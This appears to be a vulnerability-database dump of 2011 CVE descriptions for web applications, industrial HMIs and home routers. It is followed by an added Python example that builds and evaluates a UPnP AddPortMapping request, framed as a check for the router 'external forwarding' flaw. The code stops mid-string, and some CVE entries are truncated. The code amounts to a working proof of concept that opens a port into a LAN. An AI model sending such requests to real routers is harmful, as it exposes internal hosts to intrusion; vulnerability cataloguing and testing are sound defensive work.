[CVE-2011-4951] Open redirect vulnerability in phpgwapi/ntlm/index.php in EGroupware Enterprise Line (EPL) before 11.1.20110804-1 and EGroupware Community Edition before 1.8.001.20110805 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the forward parameter.
[CVE-2011-4950] Cross-site scripting (XSS) vulnerability in phpgwapi/js/jscalendar/test.php in EGroupware Enterprise Line (EPL) before 11.1.20110804-1 and EGroupware Community Edition before 1.8.001.20110805 allows remote attackers to inject arbitrary web script or HTML via the lang parameter.
[CVE-2011-4942] Multiple cross-site scripting (XSS) vulnerabilities in admin/configuration.php in Geeklog before 1.7.1sr1 allow remote attackers to inject arbitrary web script or HTML via the (1) subgroup or (2) conf_group parameters. NOTE: this vulnerability might require a user-assisted attack or a bypass of a CSRF protection mechanism.
[CVE-2011-4928] Cross-site scripting (XSS) vulnerability in the textile formatter in Redmine before 1.0.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-4926] Cross-site scripting (XSS) vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2011-4923] Cross-site scripting (XSS) vulnerability in View.pm in BackupPC 3.0.0, 3.1.0, 3.2.0, 3.2.1, and possibly earlier allows remote attackers to inject arbitrary web script or HTML via the num parameter in a view action to index.cgi, related to the log file viewer, a different vulnerability than CVE-2011-3361.
[CVE-2011-4920] Multiple cross-site scripting (XSS) vulnerabilities in e107 0.7.26, and other versions before 1.0.0, allow remote attackers to inject arbitrary web script or HTML via the URL to (1) e107_images/thumb.php or (2) rate.php, (3) resend_name parameter to e107_admin/users.php, and (4) link BBCode in user signatures.
[CVE-2011-4918] Multiple cross-site scripting (XSS) vulnerabilities in Elxis CMS 2009.2, 2009.3 and 2009.3 Aphrodite before revision 2684 allow remote attackers to inject arbitrary web script or HTML via the (1) task parameter to elxis/index.php, and (2) PATH_INFO to elxis/administrator/index.php.
[CVE-2011-4910] Cross-site scripting (XSS) vulnerability in Joomla! before 1.5.12 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2011-4909] Multiple cross-site scripting (XSS) vulnerabilities in Joomla! before 1.5.12 allow remote attackers to inject arbitrary web script or HTML via the HTTP_REFERER header to (1) components/com_content/views/article/tmpl/form.php, (2) components/com_user/controller.php, (3) plugins/system/legacy/html.php, or (4) templates/beez/html/com_content/article/form.php.
[CVE-2011-4883] The web server in Certec atvise webMI2ADS (aka webMI) before 2.0.2 does not properly validate values in HTTP requests, which allows remote attackers to cause a denial of service (resource consumption) via a crafted request.
[CVE-2011-4882] The web server in Certec atvise webMI2ADS (aka webMI) before 2.0.2 allows remote attackers to cause a denial of service (application exit) via an unspecified command in an HTTP request.
[CVE-2011-4881] The web server in Certec atvise webMI2ADS (aka webMI) before 2.0.2 does not properly check return values from functions, which allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted HTTP request.
[CVE-2011-4880] Directory traversal vulnerability in the web server in Certec atvise webMI2ADS (aka webMI) before 2.0.2 allows remote attackers to read arbitrary files via a crafted HTTP request.
[CVE-2011-4879] miniweb.exe in the HMI web server in Siemens WinCC flexible 2004, 2005, 2007, and 2008 before SP3
[CVE-2011-4878] Directory traversal vulnerability in miniweb.exe in the HMI web server in Siemens WinCC flexible 2004, 2005, 2007, and 2008 before SP3
[CVE-2011-4859] The Schneider Electric Quantum Ethernet Module, as used in the Quantum 140NOE771* and 140CPU65* modules, the Premium TSXETY* and TSXP57* modules, the M340 BMXNOE01* and BMXP3420* modules, and the STB DIO STBNIC2212 and STBNIP2* modules, uses hardcoded passwords for the (1) AUTCSE, (2) AUT_CSE, (3) fdrusers, (4) ftpuser, (5) loader, (6) nic2212, (7) nimrohs2212, (8) nip2212, (9) noe77111_v500, (10) ntpupdate, (11) pcfactory, (12) sysdiag, (13) target, (14) test, (15) USER, and (16) webserver accounts, which makes it easier for remote attackers to obtain access via the (a) TELNET, (b) Windriver Debug, or (c) FTP port.
[CVE-2011-4853] The Control Panel in Parallels Plesk Panel 10.4.4_build20111103.18 includes an RFC 1918 IP address within a web page, which allows remote attackers to obtain potentially sensitive information by reading this page, as demonstrated by smb/user/list-data/items-per-page/ and certain other files.
[CVE-2011-4852] The Control Panel in Parallels Plesk Panel 10.4.4_build20111103.18 generates web pages containing external links in response to GET requests with query strings for enterprise/mobile-monitor/ and certain other files, which makes it easier for remote attackers to obtain sensitive information by reading (1) web-server access logs or (2) web-server Referer logs, related to a "cross-domain Referer leakage" issue.
[CVE-2011-4831] Directory traversal vulnerability in webFileBrowser.php in Web File Browser 0.4b14 allows remote authenticated users to read arbitrary files via a ..%2f (encoded dot dot) in the file parameter in a download action.
[CVE-2011-4830] Multiple cross-site scripting (XSS) vulnerabilities in the com_listing component in Barter Sites component 1.3 for Joomla! allow remote authenticated users to inject arbitrary web script or HTML via the (1) listing_title, (2) description, (3) homeurl (aka Website Address), (4) paystring (aka Payment types accepted), (5) sell_price, (6) shipping_cost, and (7) quantity parameters to index.php.
[CVE-2011-4827] Multiple cross-site scripting (XSS) vulnerabilities in AutoSec Tools V-CMS 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) p parameter to redirect.php and (2) box parameter to includes/TrueColorPicker/index.php, which is not properly handled in includes/TrueColorPicker/class.TrueColorPicker.php.
[CVE-2011-4822] Multiple cross-site scripting (XSS) vulnerabilities in the user profile feature in Atlassian FishEye before 2.5.5 allow remote attackers to inject arbitrary web script or HTML via (1) snippets in a user comment, which is not properly handled in a Confluence page, or (2) the user profile display name, which is not properly handled in a FishEye page.
[CVE-2011-4819] Multiple cross-site scripting (XSS) vulnerabilities in IBM Maximo Asset Management and Asset Management Essentials 6.2, 7.1, and 7.5 allow remote attackers to inject arbitrary web script or HTML via the uisesionid parameter to (1) maximo.jsp or (2) the default URI under ui/.
[CVE-2011-4818] Open redirect vulnerability in IBM Maximo Asset Management and Asset Management Essentials 6.2, 7.1, and 7.5 allows remote authenticated users to redirect users to arbitrary web sites and conduct phishing attacks via the uisessionid parameter to an unspecified component.
[CVE-2011-4814] Multiple cross-site scripting (XSS) vulnerabilities in Dolibarr 3.1.0 RC and probably earlier allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) index.php, (2) admin/boxes.php, (3) comm/clients.php, (4) commande/index.php
[CVE-2011-4812] Cross-site scripting (XSS) vulnerability in nowosci.php in BestShopPro allows remote attackers to inject arbitrary web script or HTML via the str parameter.
[CVE-2011-4809] Multiple cross-site scripting (XSS) vulnerabilities in the HM Community (com_hmcommunity) component before 1.01 for Joomla! allow remote attackers to inject arbitrary web script or HTML via the (1) language[], (2) university[], (3) persent[], (4) company_name[], (5) designation[], (6) music[], (7) books[], (8) movies[], (9) games[], (10) syp[], (11) ft[], and (12) fa[] parameters in a save task for a profile to index.php. NOTE: some of these details are obtained from third party information.
[CVE-2011-4806] Multiple cross-site scripting (XSS) vulnerabilities in main.php in phpAlbum 0.4.1.16 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) var1 and (2) keyword parameters.
[CVE-2011-4805] Cross-site scripting (XSS) vulnerability in pubDBLogon.jsp in SAP Crystal Report Server 2008 allows remote attackers to inject arbitrary web script or HTML via the service parameter.
[CVE-2011-4801] SQL injection vulnerability in akeyActivationLogin.do in Authenex Web Management Control in Authenex Strong Authentication System (ASAS) Server 3.1.0.2 and 3.1.0.3 allows remote attackers to execute arbitrary SQL commands via the username parameter.
[CVE-2011-4785] Directory traversal vulnerability in the HP-ChaiSOE/1.0 web server on the HP LaserJet P3015 printer with firmware before 07.080.3, LaserJet 4650 printer with firmware 07.006.0, and LaserJet 2430 printer with firmware 08.113.0_I35128 allows remote attackers to read arbitrary files via unspecified vectors, a different vulnerability than CVE-2008-4419.
[CVE-2011-4780] Multiple cross-site scripting (XSS) vulnerabilities in libraries/display_export.lib.php in phpMyAdmin 3.4.x before 3.4.9 allow remote attackers to inject arbitrary web script or HTML via crafted URL parameters, related to the export panels in the (1) server, (2) database, and (3) table sections.
[CVE-2011-4778] Cross-site scripting (XSS) vulnerability in Splunk Web in Splunk 4.2.x before 4.2.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka SPL-44614.
[CVE-2011-4777] Cross-site scripting (XSS) vulnerability in the Site Editor (aka SiteBuilder) feature in Parallels Plesk Panel 10.4.4_build20111103.18 allows remote attackers to inject arbitrary web script or HTML via the login parameter to preferences.html.
[CVE-2011-4776] Multiple cross-site scripting (XSS) vulnerabilities in the Control Panel in Parallels Plesk Panel 10.4.4_build20111103.18 allow remote attackers to inject arbitrary web script or HTML via crafted input to a PHP script, as demonstrated by admin/update/settings/ and certain other files.
[CVE-2011-4767] The Site Editor (aka SiteBuilder) feature in Parallels Plesk Small Business Panel 10.2.0 has web pages containing e-mail addresses that are not intended for correspondence about the local application deployment, which allows remote attackers to obtain potentially sensitive information by reading a page, as demonstrated by js/Wizard/Status.js and certain other files.
[CVE-2011-4764] Multiple cross-site scripting (XSS) vulnerabilities in the Site Editor (aka SiteBuilder) feature in Parallels Plesk Small Business Panel 10.2.0 allow remote attackers to inject arbitrary web script or HTML via crafted input to a PHP script, as demonstrated by Wizard/Edit/Modules/Image and certain other files.
[CVE-2011-4760] Parallels Plesk Small Business Panel 10.2.0 has web pages containing e-mail addresses that are not intended for correspondence about the local application deployment, which allows remote attackers to obtain potentially sensitive information by reading a page, as demonstrated by smb/email-address/list and certain other files.
[CVE-2011-4759] Parallels Plesk Small Business Panel 10.2.0 generates web pages containing external links in response to GET requests with query strings for client@1/domain@1/hosting/file-manager/ and certain other files, which makes it easier for remote attackers to obtain sensitive information by reading (1) web-server access logs or (2) web-server Referer logs, related to a "cross-domain Referer leakage" issue.
[CVE-2011-4754] Multiple cross-site scripting (XSS) vulnerabilities in Parallels Plesk Small Business Panel 10.2.0 allow remote attackers to inject arbitrary web script or HTML via crafted input to a PHP script, as demonstrated by smb/app/available/id/apscatalog/ and certain other files.
[CVE-2011-4751] SmarterTools SmarterStats 6.2.4100 generates web pages containing external links in response to GET requests with query strings for frmGettingStarted.aspx, which makes it easier for remote attackers to obtain sensitive information by reading (1) web-server access logs or (2) web-server Referer logs, related to a "cross-domain Referer leakage" issue.
[CVE-2011-4750] Multiple cross-site scripting (XSS) vulnerabilities in SmarterTools SmarterStats 6.2.4100 allow remote attackers to inject arbitrary web script or HTML via crafted input to a PHP script, as demonstrated by Default.aspx and certain other files.
[CVE-2011-4748] The billing system for Parallels Plesk Panel 10.3.1_build1013110726.09 has web pages containing e-mail addresses that are not intended for correspondence about the local application deployment, which allows remote attackers to obtain potentially sensitive information by reading a page, as demonstrated by js/ajax/core/ajax.inc.js and certain other files.
[CVE-2011-4745] Multiple cross-site scripting (XSS) vulnerabilities in the billing system for Parallels Plesk Panel 10.3.1_build1013110726.09 allow remote attackers to inject arbitrary web script or HTML via crafted input to a PHP script, as demonstrated by admin/index.php/default and certain other files.
[CVE-2011-4742] The Control Panel in Parallels Plesk Panel 10.2.0 build 20110407.20 has web pages containing e-mail addresses that are not intended for correspondence about the local application deployment, which allows remote attackers to obtain potentially sensitive information by reading a page, as demonstrated by smb/user/list and certain other files.
[CVE-2011-4741] The Control Panel in Parallels Plesk Panel 10.2.0 build 20110407.20 includes a database connection string within a web page, which allows remote attackers to obtain potentially sensitive information by reading this page, as demonstrated by client@2/domain@1/hosting/aspdotnet/.
[CVE-2011-4740] The Control Panel in Parallels Plesk Panel 10.2.0 build 20110407.20 generates web pages containing external links in response to GET requests with query strings for smb/app/search-data/catalogId/marketplace and certain other files, which makes it easier for remote attackers to obtain sensitive information by reading (1) web-server access logs or (2) web-server Referer logs, related to a "cross-domain Referer leakage" issue.
[CVE-2011-4735] Multiple cross-site scripting (XSS) vulnerabilities in the Control Panel in Parallels Plesk Panel 10.2.0 build 20110407.20 allow remote attackers to inject arbitrary web script or HTML via crafted input to a PHP script, as demonstrated by smb/user/create and certain other files.
[CVE-2011-4731] The Server Administration Panel in Parallels Plesk Panel 10.2.0_build1011110331.18 includes an RFC 1918 IP address within a web page, which allows remote attackers to obtain potentially sensitive information by reading this page, as demonstrated by admin/home/admin and certain other files.
[CVE-2011-4726] Multiple cross-site scripting (XSS) vulnerabilities in the Server Administration Panel in Parallels Plesk Panel 10.2.0_build1011110331.18 allow remote attackers to inject arbitrary web script or HTML via crafted input to a PHP script, as demonstrated by admin/health/ and certain other files.
[CVE-2011-4718] Session fixation vulnerability in the Sessions subsystem in PHP before 5.5.2 allows remote attackers to hijack web sessions by specifying a session ID.
[CVE-2011-4712] Directory traversal vulnerability in Oxide WebServer allows remote attackers to read arbitrary files via a ..\ (dot dot backslash) in an HTTP request.
[CVE-2011-4709] Multiple cross-site scripting (XSS) vulnerabilities in Hotaru.php in the Search plugin 1.3 for Hotaru CMS allow remote attackers to inject arbitrary web script or HTML via the (1) SITE_NAME parameter to admin_index.php, or the (2) return and (3) search parameters to index.php. NOTE: some of these details are obtained from third party information.
[CVE-2011-4708] Cross-site scripting (XSS) vulnerability in IBM Rational Asset Manager before 7.5.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-4692] WebKit, as used in Apple Safari 5.1.1 and earlier and Google Chrome 15 and earlier, does not prevent capture of data about the time required for image loading, which makes it easier for remote attackers to determine whether an image exists in the browser cache via crafted JavaScript code, as demonstrated by visipisi.
[CVE-2011-4687] Opera before 11.60 allows remote attackers to cause a denial of service (CPU and memory consumption) via unspecified content on a web page, as demonstrated by a page under the cisco.com home page.
[CVE-2011-4686] Unspecified vulnerability in the Web Workers implementation in Opera before 11.60 allows remote attackers to cause a denial of service (application crash) via unknown vectors.
[CVE-2011-4685] Dragonfly in Opera before 11.60 allows remote attackers to cause a denial of service (application crash) via unspecified content on a web page, as demonstrated by forbes.com.
[CVE-2011-4682] The JavaScript engine in Opera before 11.60 does not properly implement the in operator, which allows remote attackers to bypass the Same Origin Policy via vectors related to variables on different web sites.
[CVE-2011-4680] Multiple cross-site scripting (XSS) vulnerabilities in the customer portal in vtiger CRM before 5.2.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-4670] Multiple cross-site scripting (XSS) vulnerabilities in vTiger CRM 5.2.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) viewname parameter in a CalendarAjax action, (2) activity_mode parameter in a DetailView action, (3) contact_id and (4) parent_id parameters in an EditView action, (5) day, (6) month, (7) subtab, (8) view, and (9) viewOption parameters in the index action, and (10) start parameter in the ListView action to the Calendar module
[CVE-2011-4647] Multiple cross-site scripting (XSS) vulnerabilities in the story creation feature in Geeklog 1.8.0 allow remote attackers to inject arbitrary web script or HTML via the (1) code or (2) raw BBcode tags.
[CVE-2011-4643] Multiple directory traversal vulnerabilities in Splunk 4.x before 4.2.5 allow remote authenticated users to read arbitrary files via a .. (dot dot) in a URI to (1) Splunk Web or (2) the Splunkd HTTP Server, aka SPL-45243.
[CVE-2011-4642] mappy.py in Splunk Web in Splunk 4.2.x before 4.2.5 does not properly restrict use of the mappy command to access Python classes, which allows remote authenticated administrators to execute arbitrary code by leveraging the sys module in a request to the search application, as demonstrated by a cross-site request forgery (CSRF) attack, aka SPL-45172.
[CVE-2011-4640] Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action.
[CVE-2011-4639] The (1) Traceroute and (2) Ping implementations in tools.php in SpamTitan WebTitan before 3.60 allow remote authenticated users to execute arbitrary commands via shell metacharacters in an argument, as demonstrated by an && (ampersand ampersand) sequence.
[CVE-2011-4638] Multiple SQL injection vulnerabilities in SpamTitan WebTitan before 3.60 allow remote attackers to execute arbitrary SQL commands via (1) the username parameter to login-x.php, and allow remote authenticated users to execute arbitrary SQL commands via the (2) bldomain, (3) wldomain, or (4) temid parameter to urls-x.php.
[CVE-2011-4634] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 3.4.x before 3.4.8 allow remote attackers to inject arbitrary web script or HTML via (1) a crafted database name, related to the Database Synchronize panel
[CVE-2011-4618] Cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2011-4616] Cross-site scripting (XSS) vulnerability in the HTML-Template-Pro module before 0.9507 for Perl allows remote attackers to inject arbitrary web script or HTML via template parameters, related to improper handling of > (greater than) and < (less than) characters.
[CVE-2011-4615] Multiple cross-site scripting (XSS) vulnerabilities in Zabbix before 1.8.10 allow remote attackers to inject arbitrary web script or HTML via the gname parameter (aka host groups name) to (1) hostgroups.php and (2) usergrps.php, the update action to (3) hosts.php and (4) scripts.php, and (5) maintenance.php.
[CVE-2011-4605] The (1) JNDI service, (2) HA-JNDI service, and (3) HAJNDIFactory invoker servlet in JBoss Enterprise Application Platform 4.3.0 CP10 and 5.1.2, Web Platform 5.1.2, SOA Platform 4.2.0.CP05 and 4.3.0.CP05, Portal Platform 4.3 CP07 and 5.2.x before 5.2.2, and BRMS Platform before 5.3.0 do not properly restrict write access, which allows remote attackers to add, delete, or modify items in a JNDI tree via unspecified vectors.
[CVE-2011-4593] Moodle 1.9.x before 1.9.15, 2.0.x before 2.0.6, and 2.1.x before 2.1.3 does not properly handle user/action_redir group messages, which allows remote authenticated users to discover e-mail addresses by visiting the messaging interface.
[CVE-2011-4591] Cross-site scripting (XSS) vulnerability in the print_object function in lib/datalib.php in Moodle 2.0.x before 2.0.6 and 2.1.x before 2.1.3, when a developer debugging script is enabled, allows remote attackers to inject arbitrary web script or HTML via vectors involving object states.
[CVE-2011-4590] The web services implementation in Moodle 2.0.x before 2.0.6 and 2.1.x before 2.1.3 does not properly consider the maintenance-mode state and account attributes during login attempts, which allows remote authenticated users to bypass intended access restrictions by connecting to a webservice server.
[CVE-2011-4583] Moodle 2.0.x before 2.0.6 and 2.1.x before 2.1.3 displays web service tokens associated with (1) disabled services and (2) users who no longer have authorization, which allows remote authenticated users to have an unspecified impact by reading these tokens.
[CVE-2011-4582] Open redirect vulnerability in the Calendar set page in Moodle 2.1.x before 2.1.3 allows remote authenticated users to redirect users to arbitrary web sites and conduct phishing attacks via a redirection URL.
[CVE-2011-4581] mod/wiki/pagelib.php in Moodle 2.0.x before 2.0.6 and 2.1.x before 2.1.3 allows remote authenticated users to discover the username of a wiki creator by visiting the history and deletion user interface.
[CVE-2011-4575] Cross-site scripting (XSS) vulnerability in the JMX console in JBoss Enterprise Application Platform (EAP) 5.2.0, Web Platform (EWP) 5.2.0, and BRMS Platform before 5.3.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2011-4572] Cross-site scripting (XSS) vulnerability in inc/tesmodrewite.php in CF Image Hosting Script 1.3.82, 1.4.1, and probably other versions before 1.4.2 allows remote attackers to inject arbitrary web script or HTML via the q parameter. NOTE: this was originally reported as a file disclosure vulnerability, but this is likely inaccurate.
[CVE-2011-4568] Cross-site scripting (XSS) vulnerability in view/frontend-head.php in the Flowplayer plugin before 1.2.12 for WordPress allows remote attackers to inject arbitrary web script or HTML via the URI.
[CVE-2011-4567] Cross-site scripting (XSS) vulnerability in includes/templates/template_default/templates/tpl_gv_send_default.php in Zen Cart before 1.5 allows remote attackers to inject arbitrary web script or HTML via the message parameter in a gv_send action to index.php, a different vulnerability than CVE-2011-4547.
[CVE-2011-4565] Multiple cross-site scripting (XSS) vulnerabilities in XOOPS 2.5.1.a, and possibly earlier versions, allow remote attackers to inject arbitrary web script or HTML via the (1) text parameter to include/formdhtmltextarea_preview.php or (2) img BBCODE tag within the message parameter to pmlite.php (aka Private Message). NOTE: some of these details are obtained from third party information.
[CVE-2011-4564] Cross-site scripting (XSS) vulnerability in the admin script in Active CMS 1.2 allows remote attackers to inject arbitrary web script or HTML via the mod parameter in a module action.
[CVE-2011-4563] Cross-site scripting (XSS) vulnerability in index.php in JAKCMS 2.0.4.1, and possibly other versions before 2.2.6 2011-09-23, allows remote attackers to inject arbitrary web script or HTML via the userpost parameter in a PM request, related to tinymce. NOTE: some of these details are obtained from third party information.
[CVE-2011-4562] Multiple cross-site scripting (XSS) vulnerabilities in (1) view/admin/log_item.php and (2) view/admin/log_item_details.php in the Redirection plugin 2.2.9 for WordPress allow remote attackers to inject arbitrary web script or HTML via the Referer HTTP header in a request to a post that does not exist.
[CVE-2011-4561] Cross-site scripting (XSS) vulnerability in admin.php in Phorum 5.2.18 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/index.php. NOTE: some of these details are obtained from third party information.
[CVE-2011-4560] Cross-site scripting (XSS) vulnerability in the Petition Node module 6.x-1.x before 6.x-1.5 for Drupal allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors related to signing a petition.
[CVE-2011-4553] Multiple open redirect vulnerabilities in One Click Orgs before 1.2.3 allow (1) remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the return_to parameter, and allow (2) remote authenticated users to redirect users to arbitrary web sites and conduct phishing attacks via crafted characters in the domain name of a subdomain.
[CVE-2011-4552] Multiple cross-site scripting (XSS) vulnerabilities in One Click Orgs before 1.2.3 allow remote attackers to inject arbitrary web script or HTML via the description field of (1) a new vote or (2) the eject member proposal feature.
[CVE-2011-4551] Cross-site scripting (XSS) vulnerability in tiki-cookie-jar.php in TikiWiki CMS/Groupware before 8.2 and LTS before 6.5 allows remote attackers to inject arbitrary web script or HTML via arbitrary parameters.
[CVE-2011-4547] Multiple cross-site scripting (XSS) vulnerabilities in includes/templates/template_default/common/tpl_header_test_info.php in Zen Cart 1.3.9h, when debugging is enabled, might allow remote attackers to inject arbitrary web script or HTML via the (1) main_page parameter or (2) PATH_INFO, a different vulnerability than CVE-2011-4567.
[CVE-2011-4544] Multiple cross-site scripting (XSS) vulnerabilities in Prestashop before 1.5 allow remote attackers to inject arbitrary web script or HTML via the (1) address or (2) relativ_base_dir parameter to modules/mondialrelay/googlemap.php
[CVE-2011-4541] Cross-site scripting (XSS) vulnerability in index.php in Hastymail2 2.1.1 before RC2 allows remote attackers to inject arbitrary web script or HTML via the rs parameter in a mailbox Drafts action.
[CVE-2011-4540] Multiple cross-site scripting (XSS) vulnerabilities in AtMail Open (aka AtMail Open-Source edition) 1.04 allow remote attackers to inject arbitrary web script or HTML via the func parameter to (1) ldap.php or (2) search.php.
[CVE-2011-4532] Absolute path traversal vulnerability in the ALMListView.ALMListCtrl ActiveX control in almaxcx.dll in the graphical user interface in Siemens Automation License Manager (ALM) 2.0 through 5.1+SP1+Upd2 allows remote attackers to overwrite arbitrary files via the Save method.
[CVE-2011-4526] Buffer overflow in an ActiveX control in Advantech/BroadWin WebAccess before 7.0 might allow remote attackers to execute arbitrary code via a long string value in unspecified parameters.
[CVE-2011-4525] Advantech/BroadWin WebAccess before 7.0 allows remote attackers to trigger the extraction of arbitrary web content into a batch file on a client system, and execute this batch file, via unspecified vectors.
[CVE-2011-4524] Buffer overflow in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary code via a long string value in unspecified parameters.
[CVE-2011-4523] Cross-site scripting (XSS) vulnerability in bwview.asp in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
[CVE-2011-4522] Cross-site scripting (XSS) vulnerability in bwerrdn.asp in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
[CVE-2011-4521] SQL injection vulnerability in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary SQL commands via crafted string input.
[CVE-2011-4520] Heap-based buffer overflow in an ActiveX component in MICROSYS PROMOTIC before 8.1.5 allows remote attackers to cause a denial of service via a crafted web page.
[CVE-2011-4519] Stack-based buffer overflow in an ActiveX component in MICROSYS PROMOTIC before 8.1.5 allows remote attackers to cause a denial of service via a crafted web page.
[CVE-2011-4518] Directory traversal vulnerability in the PmWebDir object in the web server in MICROSYS PROMOTIC before 8.1.5 allows remote attackers to read arbitrary files via unspecified vectors.
[CVE-2011-4515] Siemens WinCC (TIA Portal) 11 uses a reversible algorithm for storing HMI web-application passwords in world-readable and world-writable files, which allows local users to obtain sensitive information by leveraging (1) physical access or (2) Sm@rt Server access.
[CVE-2011-4512] CRLF injection vulnerability in the HMI web server in Siemens WinCC flexible 2004, 2005, 2007, and 2008 before SP3
[CVE-2011-4511] Cross-site scripting (XSS) vulnerability in the HMI web server in Siemens WinCC flexible 2004, 2005, 2007, and 2008 before SP3
[CVE-2011-4510] Cross-site scripting (XSS) vulnerability in the HMI web server in Siemens WinCC flexible 2004, 2005, 2007, and 2008 before SP3
[CVE-2011-4509] The HMI web server in Siemens WinCC flexible 2004, 2005, 2007, and 2008
[CVE-2011-4508] The HMI web server in Siemens WinCC flexible 2004, 2005, 2007, and 2008 before SP3
[CVE-2011-4506] The UPnP IGD implementation on the Thomson (aka Technicolor) TG585 with firmware 7.x before 7.4.3.2 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability.
[CVE-2011-4505] The UPnP IGD implementation on SpeedTouch 5x6 devices with firmware before 6.2.29 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability.
[CVE-2011-4504] The UPnP IGD implementation in the Pseudo ICS UPnP software on the ZyXEL P-330W allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability.
[CVE-2011-4503] The UPnP IGD implementation in Broadcom Linux on the Sitecom WL-111 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability.
[CVE-2011-4501] The UPnP IGD implementation in Edimax EdiLinux on the Edimax BR-6104K with firmware before 3.25, Edimax 6114Wg, Canyon-Tech CN-WF512 with firmware 1.83, Canyon-Tech CN-WF514 with firmware 2.08, Sitecom WL-153 with firmware before 1.39, and Sweex LB000021 with firmware 3.15 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability.
[CVE-2011-4499] The UPnP IGD implementation in the Broadcom UPnP stack on the Cisco Linksys WRT54G with firmware before 4.30.5, WRT54GS v1 through v3 with firmware before 4.71.1, and WRT54GS v4 with firmware before 1.06.1 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability.
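The six entries above (CVE-2011-4499 through CVE-2011-4506) share one mechanism: the router's WANIPConnection service honours an AddPortMapping action that arrives on the WAN side, so an unauthenticated host on the Internet can open a forwarding into the LAN. The following Python is an added example, not code from vulscan, VulDB or any of the affected vendors; it builds the SOAP request exactly as a client on the WAN side would send it and classifies the device's answer offline. The control URL, the internal client address and the two device responses are constructed for the example; a real check would send the request to the device's WAN address with the transport of your choice.

```python
"""Build and evaluate a UPnP IGD AddPortMapping exchange (added example).

Assumed: the WANIPConnection:1 service (the one these IGD entries involve),
a hypothetical control URL, and constructed device answers. The point of
the check is where the request is sent from: an 'accepted' answer to a
request that entered on the WAN interface is the "external forwarding"
condition the listed CVEs describe.
"""
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SERVICE = "urn:schemas-upnp-org:service:WANIPConnection:1"
SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
UPNP_CTRL = "urn:schemas-upnp-org:control-1-0"
CONTROL_URL = "/upnp/control/WANIPConn1"   # hypothetical, varies per device


def build_add_port_mapping(external_port, internal_client, internal_port,
                           protocol="TCP", lease=3600,
                           description="external-forwarding check"):
    """Return (headers, body) for one AddPortMapping SOAP action."""
    args = [
        ("NewRemoteHost", ""),                       # any remote host
        ("NewExternalPort", str(external_port)),
        ("NewProtocol", protocol),
        ("NewInternalPort", str(internal_port)),
        ("NewInternalClient", internal_client),      # LAN target of the mapping
        ("NewEnabled", "1"),
        ("NewPortMappingDescription", description),
        ("NewLeaseDuration", str(lease)),            # seconds; 0 = permanent
    ]
    arg_xml = "".join(f"<{k}>{escape(v)}</{k}>" for k, v in args)
    body = (
        '<?xml version="1.0"?>'
        f'<s:Envelope xmlns:s="{SOAP_ENV}" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        f'<s:Body><u:AddPortMapping xmlns:u="{SERVICE}">{arg_xml}'
        '</u:AddPortMapping></s:Body></s:Envelope>'
    )
    headers = {
        "Content-Type": 'text/xml; charset="utf-8"',
        # UPnP requires the action name in SOAPAction, quoted
        "SOAPAction": f'"{SERVICE}#AddPortMapping"',
    }
    return headers, body


def classify_response(status, body):
    """Classify the device's answer.

    Returns {"accepted": bool, "error_code": int|None, "error_text": str|None}.
    Tag names are matched by local name so prefix choices do not matter.
    """
    result = {"accepted": False, "error_code": None, "error_text": None}
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        result["error_text"] = "unparseable response"
        return result
    for el in root.iter():
        local = el.tag.rsplit("}", 1)[-1]
        if local == "AddPortMappingResponse":
            result["accepted"] = (status == 200)
        elif local == "errorCode" and el.text and el.text.strip().isdigit():
            result["error_code"] = int(el.text.strip())   # e.g. 718 ConflictInMappingEntry
        elif local == "errorDescription":
            result["error_text"] = (el.text or "").strip()
    return result


def check_external_forwarding(send, internal_client="192.168.1.10"):
    """Run the check through a caller-supplied transport.

    `send(headers, body)` must return (status, response_body); the caller
    points it at the device's WAN address. Returns the classification.
    """
    headers, body = build_add_port_mapping(8080, internal_client, 22)
    status, resp = send(headers, body)
    return classify_response(status, resp)


# Constructed device answers used for the offline demonstration.
SAMPLE_OK = (
    '<?xml version="1.0"?>'
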